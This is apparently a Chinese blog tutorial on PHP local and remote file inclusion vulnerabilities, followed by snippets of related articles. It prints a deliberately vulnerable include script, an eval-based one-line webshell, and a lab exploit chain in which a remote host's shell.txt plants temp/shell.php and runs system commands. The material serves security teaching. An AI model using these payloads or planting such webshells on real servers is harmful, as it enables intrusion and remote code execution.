文件包含漏洞-基本原理

原创 已于 2023-05-02 23:13:02 修改 · 280 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #安全 #web安全

于 2023-04-24 13:56:27 首次发布

文件包含漏洞

文件包含漏洞其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。

有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞

一、本地文件包含

本地文件包含指的是能够打开并包含本地文件的漏洞

1.利用条件

php.ini中allow_url_fopen = on (默认开启)

用户参数可控且没有进行过滤

2.代码示例
# 存在漏洞的php站点示例
<?php

$filename = $_GET['filename'];
include $filename;

echo "<hr>hello,world.";

?>

# 漏洞利用示例

http://localhost/learn/fileinc.php?filename=c:\users\administrator\desktop\test.txt

image-20230424083237668

*由于include等文件包含函数的特性,可以读取任何有权限的文件,或者执行恶意脚本。

二、远程文件包含
1.利用条件

php.ini中allow_url_fopen = on(默认开启) 和 allow_url_include = on (默认关闭)

用户参数可控且没有进行过滤

image-20230424090029057

2.代码示例

创建shell.php,用于漏洞利用执行

<?php

$code = $_GET['code'];
eval($code);

?>

# 漏洞利用
http://localhost/learn/fileinc.php?filename=http://192.168.30.103/security/shell.php?code=phpinfo();

image-20230424135432354

注意:这里发现显示的信息是本地主机的而不是靶机的,因为php脚本被本地执行了

因此需要更改包含的文件类型,不能是php文件,同时参数需要将“?”更改为“&”

http://localhost/learn/fileinc.php?filename=http://192.168.30.103/security/shell.txt&code=phpinfo();

image-20230424135509570

可以看到这样显示的才是存在漏洞的主机的信息

include或者其他文件包含函数可以包含非php文件,若内容为有效的php代码,则会被执行。

3.漏洞利用实验

①将shell.txt写入一句话

<?php 
    file_put_contents('temp/shell.php', '<?php @eval($_GET['code']); ?>'); 
?>

②远程主机包含shell.txt

http://192.168.30.1/learn/fileinc.php?filename=http://192.168.30.103/security/shell.txt

③成功在远程主机写入php木马后进行利用

http://192.168.30.1/learn/temp/shell.php?code=system('ipconfig');
文件包含漏洞及原理
m0_68019293的博客
03-29 7725
什么是文件包含漏洞 1:随着网站的业务的需求,程序开发人员一般希望代码更加灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。 经常见到的函数 1:include()当前使用该函数包含文件时,只有代码执行到include()函数时将文件包含起来,发生错误时给出一个警告,然后继续执行语句 2,include_once()功能和include()相同,区别当重复调
文件包含漏洞基本原理解析】
My笔记的博客
05-03 288
可以看到我们的test被存储到session文件中,利用这点我们可以向session文件中写shell,通过包含session文件来getshell。文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制包含其他的恶意文件,导致执行了非预期的代码。当我们向filename传入路径文件时,由于这个文件是纯文本,服务器会向我们输出文件里面的内容。根据cookie中的session值,我们就可以找到服务器上的session文件。参数没有经过严格的过滤,直接带入了include函数,攻击者可以修改。
文件包含漏洞原理
qq_42133828的博客
11-10 7313
什么是文件包含漏洞PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。最常见的就属于本地文件包含(Local File Inclusion)漏洞了。 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为...
文件包含漏洞(原理及介绍)
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
12-08 6690
File inclusion,文件包含漏洞)。程序开发人员通常出于灵活性的考虑,会将被包含的文件设置成变量,然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件,造成文件包含漏洞文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞.
Web安全实战系列:文件包含漏洞
gclome的博客
11-07 647
**本文转自:freebuf 山东安山** 前言 《Web安全实战》系列集合了WEB类常见的各种漏洞,笔者根据自己在Web安全领域中学习和工作的经验,对漏洞原理和漏洞利用面进行了总结分析,致力于漏洞准确性、丰富性,希望对WEB安全工作者、WEB安全学习者能有所帮助,减少获取知识的时间成本。 0x01 文件包含简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件...
网络安全-文件包含漏洞原理、攻击及防御
关注网络安全、云原生安全
08-14 7174
目录 简介 类型 原理 攻击 防御 简介 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 类型 根据不同的配置环境,文件包含漏洞分为如下两种情况:1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击者更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。2.远程文件
文件包含漏洞-02】文件包含漏洞分类与原理及其空字符安全绕过实验
cc
02-22 3263
文件包含(file inclusion)漏洞,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。本地文件包含LFI(local file inclusion):当被包含的文件在服务器本地时,可以通过文件路径(相对或绝对)加载(读取和打开)文件,就形成本地文件包含
文件上传漏洞-原理篇
AkangBoy的博客
12-02 3892
本文主要介绍文件上传漏洞原理、危害等基础知识,以及常见的文件上传检测机制和绕过手段
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
Apache Tomcat文件包含漏洞(CVE-2020-1938)【原理扫描】
小小关的博客
01-13 4807
对于该中间件漏洞,系统扫描模块没有爬虫能力,可能导致漏报,建议使用WEB扫描模块进行扫描。 ApacheTomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServerPage(JSP)的支持。 TomcatAJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步实现远程代码的执行。 受影响版本: ...
文件包含漏洞、原理、利用
m0_52556798的博客
03-28 4460
最近的总结都比较简单,但不是在水,只是在我学习过程中总结的觉得真的有用的知识,还有就是有些代码发不出来我也没办法,所以就有所调整。 文件包含原理是啥? 文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时, 就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件, 此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 讲讲
文件包含漏洞详解
weixin_47306547的博客
09-09 4109
什么是文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。 如果说使用文件包含的路径是攻击者可控的话,此时,我们可以通过控制参数变量从而能包含本不在开发者意愿之内的文件。 PHP中常见包含文件函数 include() 当使用改函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 include_once() ...
文件包含漏洞原理和利用
最新发布
2302_81945070的博客
07-21 1315
文件包含漏洞Web 应用中常见的高危漏洞,主要源于应用在使用文件包含函数(如 PHP 的 include ()、require () 等)时,未对包含的文件路径进行严格过滤与校验,导致攻击者可通过构造恶意路径,让服务器包含并执行非预期文件。这类漏洞广泛存在于使用动态包含机制的脚本语言(如 PHP、JSP 等)开发的应用中,其核心风险在于攻击者能借助可控的文件路径,引入恶意代码或敏感信息,进而危害服务器安全
文件包含漏洞原理与实践
dzqxwzoe的博客
03-04 616
文件包含函数「不关心」文件的「后缀名」,它只是简单的执行被包含的文件,如果文件的内容是代码,就会执行代码;base64加密的结果,加密代码时,后面不要加?> ,否则会报语法错误。与php://input 相似,不同的是,php://input是将post请求体中的内容当做文件执行,而data://将GET请求中,逗号后面的内容当做文件执行。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
文件包含漏洞详解:原理、利用与防御
tengyuehou的博客
04-06 618
服务器中的中间件、SSH等服务都有记录日志的功能,如果开启了记录日志功能,用户访问的日志都会存储到不同服务的相关文件中,如果日志文件的位置是默认位置或者是可以通过其他方法获取到,就可以通过访问日志将恶意代码写入到日志文件中,然后通过文件包含漏洞包含日志中的恶意代码,获得Web服务器的权限。比较典型的日志文件包含有中间件日志文件包含和SSH日志包含
文件包含漏洞的原理
孤的博客
11-23 1349
文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞PHP Web Application中居多。 文件包含分类 1.本地...
文件包含漏洞
syy
05-01 6654
目录 一、文件包含漏洞概述 二、文件包含漏洞类型 三、常用的防御方式 四、常用的绕过方式 一、文件包含漏洞概述 1.什么是文件包含 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 2.文件包含漏洞产生原理 文件包含函数加载的参数没有经过过滤或严格定义,可以被用户控制,包含其他恶意文件,导致了执行非预期代码。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量来进行动态调用,但正是
任意文件读取漏洞-高危
06-26
### 任意文件读取漏洞概述 任意文件读取漏洞(Arbitrary File Read Vulnerability)是一种常见的Web应用程序安全漏洞,攻击者可以利用该漏洞访问服务器上的任意文件,包括系统文件、配置文件、数据库凭证等敏感信息。这类漏洞通常由于应用程序在处理用户输入时未进行充分的验证和过滤,导致攻击者可以通过构造特殊请求来绕过安全机制。 ### 漏洞原理 任意文件读取漏洞的核心原理在于应用程序对用户输入的路径参数缺乏严格的校验。例如,在URL中传递文件路径作为参数时,如果未对路径进行规范化处理或限制访问范围,攻击者可能通过构造类似`../`的路径遍历符号来访问上级目录中的文件。此外,某些应用可能会直接将用户输入拼接到文件路径中,而没有进行任何检查,这也为攻击者提供了可乘之机。 ### 利用方式 攻击者通常会通过以下几种方式来利用任意文件读取漏洞: 1. **路径遍历**:通过构造包含`../`的路径,尝试访问受限目录下的文件。例如,`/arcgis/manager/3370/js/../WEB-INF/web.xml`[^1]。 2. **本地文件包含(LFI)**:某些情况下,应用程序可能会动态包含本地文件,攻击者可以通过修改参数来包含并读取任意文件。 3. **远程文件包含(RFI)**:虽然不如LFI常见,但在某些配置不当的情况下,攻击者可能通过指定外部URL来引入恶意文件。 ### 危害与影响 任意文件读取漏洞的危害非常严重,主要包括以下几个方面: - **泄露敏感信息**:攻击者可以读取服务器上的配置文件、数据库连接字符串、密码文件等敏感数据,进而获取系统的控制权。 - **进一步渗透**:一旦获得系统内部的信息,攻击者可以利用这些信息发起更深层次的攻击,如SQL注入、命令执行等。 - **服务中断**:攻击者还可能通过读取关键系统文件而导致服务异常或崩溃,造成拒绝服务(DoS)攻击。 ### 修复方案 为了有效防范任意文件读取漏洞,建议采取以下措施: 1. **输入验证**:对所有来自用户的输入进行严格的验证,确保其符合预期格式。特别是对于文件路径相关的参数,应禁止使用特殊字符如`../`等。 2. **最小权限原则**:确保Web服务器和应用程序以最低必要权限运行,减少潜在风险。 3. **白名单机制**:对于需要访问特定文件的应用逻辑,采用白名单机制,仅允许访问预定义的安全路径。 4. **日志监控与告警**:定期审查服务器日志,发现异常访问行为及时响应,并设置相应的告警机制。 5. **更新与补丁管理**:保持软件版本的最新状态,及时安装官方发布的安全补丁。 ### 示例代码:防止任意文件读取 下面是一个简单的PHP示例,展示如何防止任意文件读取漏洞: ```php <?php // 定义允许访问的文件列表 $allowed_files = ['index.html', 'about.html', 'contact.html']; // 获取用户请求的文件名 $file = isset($_GET['file']) ? $_GET['file'] : ''; // 检查文件是否存在于白名单中 if (in_array($file, $allowed_files)) { // 文件存在白名单中,允许读取 readfile("files/" . $file); } else { // 文件不在白名单中,返回错误信息 http_response_code(403); echo "Forbidden"; } ?> ``` 上述代码通过定义一个白名单数组`$allowed_files`,并在处理用户请求之前对其进行检查,从而有效地阻止了非法文件访问。 ---
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值